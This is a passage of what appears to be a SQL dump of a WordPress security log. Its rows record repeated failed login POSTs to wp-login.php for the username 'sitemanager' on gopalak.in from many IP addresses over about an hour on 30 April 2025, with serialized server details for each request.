00:00:00'),(94433,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38098\";s:11:\"REMOTE_ADDR\";s:14:\"160.16.215.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745974853.6364651;s:12:\"REQUEST_TIME\";i:1745974853;}}','160.16.215.164',0,'2025-04-30 06:30:55','1970-01-01 00:00:00'),(94434,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46362\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745975172.617677;s:12:\"REQUEST_TIME\";i:1745975172;}}','69.57.162.14',0,'2025-04-30 06:36:14','1970-01-01 00:00:00'),(94435,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48470\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745975485.630223;s:12:\"REQUEST_TIME\";i:1745975485;}}','162.0.229.183',0,'2025-04-30 06:41:27','1970-01-01 00:00:00'),(94436,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60648\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745975800.8278561;s:12:\"REQUEST_TIME\";i:1745975800;}}','192.34.56.148',0,'2025-04-30 06:46:42','1970-01-01 00:00:00'),(94437,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51860\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745976118.6874001;s:12:\"REQUEST_TIME\";i:1745976118;}}','66.102.132.28',0,'2025-04-30 06:52:00','1970-01-01 00:00:00'),(94438,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49734\";s:11:\"REMOTE_ADDR\";s:13:\"162.241.92.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745976750.397964;s:12:\"REQUEST_TIME\";i:1745976750;}}','162.241.92.55',0,'2025-04-30 07:02:32','1970-01-01 00:00:00'),(94439,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48860\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.105\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745977069.4591041;s:12:\"REQUEST_TIME\";i:1745977069;}}','162.0.232.105',0,'2025-04-30 07:07:51','1970-01-01 00:00:00'),(94440,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36172\";s:11:\"REMOTE_ADDR\";s:14:\"160.16.215.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745977390.175081;s:12:\"REQUEST_TIME\";i:1745977390;}}','160.16.215.164',0,'2025-04-30 07:13:12','1970-01-01 00:00:00'),(94441,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52534\";s:11:\"REMOTE_ADDR\";s:12:\"185.61.152.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745977711.6753311;s:12:\"REQUEST_TIME\";i:1745977711;}}','185.61.152.8',0,'2025-04-30 07:18:33','1970-01-01 00:00:00'),(94442,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38402\";s:11:\"REMOTE_ADDR\";s:13:\"66.108.76.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745978029.4228201;s:12:\"REQUEST_TIME\";i:1745978029;}}','66.108.76.186',0,'2025-04-30 07:23:51','1970-01-01 00:00:00'),(94443,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 